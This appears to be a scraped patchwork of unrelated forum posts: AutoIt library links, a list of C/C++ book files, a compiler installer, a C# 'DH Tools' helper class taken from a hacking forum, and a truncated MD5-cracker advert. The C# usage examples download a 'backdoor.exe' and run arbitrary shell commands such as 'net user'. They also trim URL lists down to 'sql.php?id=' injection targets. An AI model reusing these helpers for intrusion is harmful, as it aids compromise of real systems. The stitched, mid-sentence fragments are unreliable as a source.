encryption ( decryption) in the transmission of the text on any open channels of private data with a certain guarantee that they will read only one for whom they are intended. For encryption ( decryption) generated by {E, N} - public key (public key) and {D, N} - private key (private key). The public key is sent to everyone who will be supported by communication, a secret key known only to its owner . Text encrypted public key can only be decrypted with the private key . Download: https://www.dropbox.com/s/9kzuer8lbsuly27/_RSA_crypt.7z Zip UDF Description: This small library allows to work with zip-archives using the built-in Windows. Supported by definition established archives WinRar (rar.exe) and 7zip (7z.exe), if it is found that these functions use archivers (priority is on 7zip). Download: https://www.dropbox.com/s/yg9sx1x8bq1lay1/ZipUDF.au3 IsPressedEx Description: Extended function _IsPressedEx. Based on the standard UDF-functions _IsPressed (). Download:https://www.dropbox.com/s/phf5633k2jql6u0/IsPressedEx.zip Animated Tray Icon Description: Creates an animated icon in the system tray. UDF is very easy to use, the only thing that can cause difficulty - it is actually the creation of the most animated icons (frames). Maintained as separate icons (pictures) and animated PNG (not to be confused with APNG). Download:https://www.dropbox.com/s/uwglt0gui3a1ate/Animate.zip GDIP Description: A huge number of additional features to the standard library AutoIt GDIPlus.au3. Here is the full list of features included in the library (description, in English, within the library), I think that this is all possible functions provided MSDN (documented). I recommend to download all without exception. Download:https://www.dropbox.com/s/a69s66pkat7co4h/GDIP.7z Skincrafter UDF Description: library for software developers, allowing you to create original and memorable application with fully interactive graphical interface. Skins:Skincrafter Skins gallery. « Download:https://www.dropbox.com/s/e5r3anvprz7u1qd/Skincrafter.rar FTP Description: Provides work with FTP servers. Yes , like the library is present in the latest versions of AutoIt Beta, but this version has a number of useful differences and additions. Firstly this UDF uses a "transparent" approach to writing scripts ( similar to GDI +). Secondly here there are such extremely useful features like _InternetGetOption () and _InternetSetOption (), without which I can not imagine working with a normal FTP. As there are no less useful and it is unclear for what reasons are not included in the " native " FTP library functions : _FTP_ReadFile (), _FTP_WriteFile () and _IsInternet () ( though _FTP_ReadFile () like already present) . Description ( in English ) for all functions and constants is inside the library . As well as a separate file - WinINetErrorMessages.au3 - collected constants that may be needed when working with the library . Download:https://www.dropbox.com/s/5erkqvbm65eyxrb/FTP.au3 POP3 Description: Reading, delete messages from mail servers. Download:https://www.dropbox.com/s/2igol0lizh3clji/POP3.au3 WinAPI_AssocQueryString() Description: Gets the information from the registry associated with the original row ($ sAssoc). Type of information returned depends on the parameter $ iType ($ ASSOCSTR_ ...). For example, using this function to get the icon (path to the file containing the icon and the index) registered for a specific type (extension) of the file, and more. This feature will be included in the library WinAPIEx.au3 the next update (version 1.79). Download:https://www.dropbox.com/s/1fgxn9ubcjbws02/Registry%20UDF.au3 WinUser UDF v2.6 Description: Library to work (adding, deleting, setting parameters) with the users (accounts) Windows. Uses net user and net localgroup. Download: https://www.dropbox.com/s/y5tna0coynkqmvj/WinUser.au3

C++ Books [*] Applied C++ - Practical Techniques For Building Better Software (2003).chm [*] Beginning C++ Game Programming (2004).pdf [*] Beyond The C++ Standard Library - An Introduction To Boost (2005).chm [*] C++ - How To Program, 5th Edition (2005).chm [*] C++ By Dissection (2002).pdf [*] C++ Coding Standards - 101 Rules, Guidelines, And Best Practices (2004).chm [*] C++ Cookbook (2005).chm [*] C++ Demystified - A Self Teaching Guide (2004).chm [*] C++ For Business Programming, 2nd Edition (2005).chm [*] C++ For Dummies, 5th Edition (2004).pdf [*] C++ For Mathematicians - An Introduction For Students And Professionals (2006).pdf [*] C++ From The Ground Up, 3rd Edition (2003).pdf [*] C++ GUI Programming With Qt 4 (2006).chm [*] C++ In A Nutshell (2003).chm [*] C++ Plus Data Structures, 3rd Edition (2003).pdf [*] C++ Primer, 4th Edition (2005).chm [*] C++ Templates - The Complete Guide (2002).chm [*] C++ Timesaving Techniques For Dummies (2005).pdf [*] C++ Tutorial By Clayman.html [*] c++ tutorial.pdf [*] C-C++ Programmer's Reference, 3rd Edition (2003).chm [*] Creating Games In C++ - A Step By Step Guide (2006).chm [*] Cryptography In C And C++ (2001).chm [*] Effective C++, 3rd Edition (2005).chm [*] Exceptional C++ - 47 Engineering Puzzles, Programming Problems, And [*]Solutions (1999).chm [*] Exceptional C++ Style - 40 New Engineering Puzzles, Programming [*]Problems, And Solutions (2004).chm [*] How Not To Program In C++ (2003).chm [*] Ivor Horton's Beginning Visual C++ 2005 (2006).pdf [*] Learn To Program With C++ (2003).pdf [*] McGraw Hill Herb Schildts C plus plus Programming Cookbook Apr 2008.pdf [*] Packt Publishing Microsoft Visual C++ Windows Applications by Example Jun 2008.pdf [*] Teach Yourself C++ in 21 Days [*] think in cpp.pdf [*] Visual C++ 6 for Dummies Quick Reference.pdf C Books [*] BASIC C Socket Programming In Unix For Newbies.txt [*] C & C++ Programming Style Guidlines.pdf [*] C for Dummies, 2nd Edition.pdf [*] Sams Teach Yourself Visual C Sharp 2008 in 24 Hours Complete Starter Kit Jul 2008.pdf [*] The C Programming Language Torn Apart.html C,C++

bcc55 Setup Download What is "bcc55 Setup Download"? It's only for programmers. It's the great free C++ compiler from Open & Agile Requirement, Test & Change Management Solutions - Borland also know as "free commandline tool" or "bcc55", but - because the manual installation is difficult to most people - extended by a little setup-program I wrote making the installation more easy. Download You can now either: http://www.lawilog.de/download/bcc55.exe (including the original files as well) or http://www.lawilog.de/download/SetItUp.zip (copy the exe-file to the bcc55 directory and run) Both version include the readme file with the source code as well. By the way: I recommend the editor TextPad - the text editor for Windows

[+] GET & POST requests Contents [+] See the number of HTTP Status at one glance [+] HTTP FingerPrinting [+] Read a file [+] Write or create a file [+] See the current operating system [+] Remove duplicates in a list [+] Short URLs in a list [+] Download and upload files [+] See the filename in a path [+] Executing Commands [+] URI Split [+] MD5 Hash Generator [+] See the MD5 of a file [+] See the IP of a hostname // Class Name : DH Tools // Version : Beta // Author : Doddy Hackman // (C) Doddy Hackman 2014 // // Functions : // // [+] HTTP Methods GET & POST // [+] Get HTTP Status code number // [+] HTTP FingerPrinting // [+] Read File // [+] Write File // [+] GET OS // [+] Remove duplicates from a List // [+] Cut urls from a List // [+] Download // [+] Upload // [+] Get Basename from a path // [+] Execute commands // [+] URI Split // [+] MD5 Hash Generator // [+] Get MD5 of file // [+] Get IP address from host name // // Credits : // // Method POST -> https://technet.rapaport.com/Info/Pr...l_Example.aspx // Method GET -> http://stackoverflow.com/questions/4...tring-variable // HTTP Headers -> http://msdn.microsoft.com/en-us/libr...vs.110%29.aspx // List Cleaner -> http://forums.asp.net/t/1318899.aspx...m+List+String+ // Execute command -> http://www.codeproject.com/Articles/...a-Command-in-C // MD5 Hash Generator -> http://www.java2s.com/Code/CSharp/Se...ifyMD5Hash.htm // Get MD5 of file -> http://stackoverflow.com/questions/1...sum-for-a-file // // Thanks to : $DoC and atheros14 (Forum indetectables) // using System; using System.Collections.Generic; using System.Text; using System.Net; using System.IO; using System.Text.RegularExpressions; using System.Security.Cryptography; namespace clasewebtools { class DH_Tools { public string toma(string url) { string code = ""; try { WebClient nave = new WebClient(); nave.Headers["User-Agent"] = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"; code = nave.DownloadString(url); } catch { // } return code; } public string tomar(string url, string par) { string code = ""; try { HttpWebRequest nave = (HttpWebRequest) WebRequest.Create(url); nave.UserAgent = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"; nave.Method = "POST"; nave.ContentType = "application/x-www-form-urlencoded"; Stream anteantecode = nave.GetRequestStream(); anteantecode.Write(Encoding.ASCII.GetBytes(par), 0, Encoding.ASCII.GetBytes(par).Length); anteantecode.Close(); StreamReader antecode = new StreamReader(nave.GetResponse().GetResponseStream()); code = antecode.ReadToEnd(); } catch { // } return code; } public string respondecode(string url) { String code = ""; try { HttpWebRequest nave = (HttpWebRequest)WebRequest.Create(url); nave.UserAgent = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"; HttpWebResponse num = (HttpWebResponse)nave.GetResponse(); int number = (int)num.StatusCode; code = Convert.ToString(number); } catch { code = "404"; } return code; } public string httpfinger(string url) { String code = ""; try { HttpWebRequest nave1 = (HttpWebRequest)WebRequest.Create(url); HttpWebResponse nave2 = (HttpWebResponse)nave1.GetResponse(); for (int num = 0; num < nave2.Headers.Count; ++num) { code = code + "[+] " + nave2.Headers.Keys[num] + ":" + nave2.Headers[num] + Environment.NewLine; } nave2.Close(); } catch { // } return code; } public string openword(string file) { String code = ""; try { code = System.IO.File.ReadAllText(file); } catch { // } return code; } public void savefile(string file,string texto) { try { System.IO.StreamWriter save = new System.IO.StreamWriter(file, true); save.Write(texto); save.Close(); } catch { // } } public string getos() { string code = ""; try { System.OperatingSystem os = System.Environment.OSVersion; code = Convert.ToString(os); } catch { code = "?"; } return code; } public List<string> repes(List<string> array) { List<string> repe = new List<string>(); foreach (string lin in array) { if (!repe.Contains(lin)) { repe.Add(lin); } } return repe; } public List<string> cortar(List<string> otroarray) { List<string> cort = new List<string>(); foreach (string row in otroarray) { String lineafinal = ""; Match regex = Regex.Match(row, @"(.*)\?(.*)=(.*)", RegexOptions.IgnoreCase); if (regex.Success) { lineafinal = regex.Groups[1].Value + "?" + regex.Groups[2].Value + "="; cort.Add(lineafinal); } } return cort; } public string download(string url,string savename) { String code = ""; WebClient nave = new WebClient(); nave.Headers["User-Agent"] = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"; try { nave.DownloadFile(url, savename); code = "OK"; } catch { code = "Error"; } return code; } public string upload(string link,string archivo) { String code = ""; try { WebClient nave = new WebClient(); nave.Headers["User-Agent"] = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"; byte[] codedos = nave.UploadFile(link, "POST", archivo); code = System.Text.Encoding.UTF8.GetString(codedos, 0, codedos.Length); } catch { code = "Error"; } return code; } public string basename(string file) { String nombre = ""; FileInfo basename = new FileInfo(file); nombre = basename.Name; return nombre; } public string console(string cmd) { string code = ""; try { System.Diagnostics.ProcessStartInfo loadnow = new System.Diagnostics.ProcessStartInfo("cmd", "/c " + cmd); loadnow.RedirectStandardOutput = true; loadnow.UseShellExecute = false; loadnow.CreateNoWindow = true; System.Diagnostics.Process loadnownow = new System.Diagnostics.Process(); loadnownow.StartInfo = loadnow; loadnownow.Start(); code = loadnownow.StandardOutput.ReadToEnd(); } catch { code = "Error"; } return code; } public string urisplit(string url,string opcion) { string code = ""; Uri dividir = new Uri(url); if (opcion == "host") { code = dividir.Host; } if (opcion == "port") { code = Convert.ToString(dividir.Port); } if (opcion == "path") { code = dividir.LocalPath; } if (opcion == "file") { code = dividir.AbsolutePath; FileInfo basename = new FileInfo(code); code = basename.Name; } if (opcion == "query") { code = dividir.Query; } if (opcion == "") { code = "Error"; } return code; } public string convertir_md5(string text) { MD5 convertirmd5 = MD5.Create(); byte[] infovalor = convertirmd5.ComputeHash(Encoding.Default.GetBytes(text)); StringBuilder guardar = new StringBuilder(); for (int numnow = 0; numnow < infovalor.Length; numnow++) { guardar.Append(infovalor[numnow].ToString("x2")); } return guardar.ToString(); } public string md5file(string file) { string code = ""; try { var gen = MD5.Create(); var ar = File.OpenRead(file); code = BitConverter.ToString(gen.ComputeHash(ar)).Replace("-", "").ToLower(); } catch { code = "Error"; } return code; } public string getip(string host) { string code = ""; try { IPAddress[] find = Dns.GetHostAddresses(host); code = find[0].ToString(); } catch { code = "Error"; } return code; } } } // The End ? namespace clasewebtools { public partial class Form1 : Form { public Form1() { InitializeComponent(); } private void button1_Click(object sender, EventArgs e) { // Examples DH_Tools tools = new DH_Tools(); // The GET Method //string code = tools.toma("http://www.petardas.com/index.php"); // The POST Method //string code = tools.tomar("http://localhost/pos.php", "probar=test&yeah=dos&control=Now"); // HTTP Status code number //string code = tools.respondecode("http://www.petardas.com/index.php"); // HTTP FingerPrinting //string code = tools.httpfinger("http://www.petardas.com/index.php"); // Read File //string code = tools.openword("C:/test.txt"); // Write File //tools.savefile("test.txt","yeah"); // GET OS //string code = tools.getos(); /* Remove duplicates from a List List<string> arrays = new List<string> { "test", "test", "test", "bye", "bye" }; List<string> limpio = tools.repes(arrays); foreach (string text in limpio) { richTextBox1.AppendText(text + Environment.NewLine); } */ /* Cut urls from a List List<string> lista = new List<string> { "http://localhost1/sql.php?id=adsasdsadsa", "http://localhost2/sql.php?id=adsasdsadsa", "http://localhost3/sql.php?id=adsasdsadsa"}; List<string> cortar = tools.cortar(lista); foreach (string test in cortar) { richTextBox1.AppendText(test + Environment.NewLine); } */ // Download File //string code = tools.download("http://localhost/backdoor.exe", "backdoor.exe"); // Upload File //string code = tools.upload("http://localhost/uploads/upload.php", "c:/test.txt"); // Get Basename from a path //string code = tools.basename("c:/dsaaads/test.txt"); // Execute commands //string code = tools.console("net user"); // URI Split // Options : host,port,path,file,query //string code = tools.urisplit("http://localhost/dsadsadsa/sql.php?id=dsadasd","host"); // MD5 Hash Generator //string code = convertir_md5("123"); // Get MD5 of file //string code = tools.md5file("c:/test.txt"); // Get IP address from host name //string code = tools.getip("www.petardas.com"); } } } https://evilzone.org/vb-vb-net-c-c-net/©-class-dh-tools/

Features: [#] Automatic separator [#] Works without proxy [#] Possibility to add your passwords in the database (Takes just a list of passwords and login type base; pass) : https://yadi.sk/d/YbVPdeN0TbEXo Sursa: MD5 Hash Decrypter v.0.2 by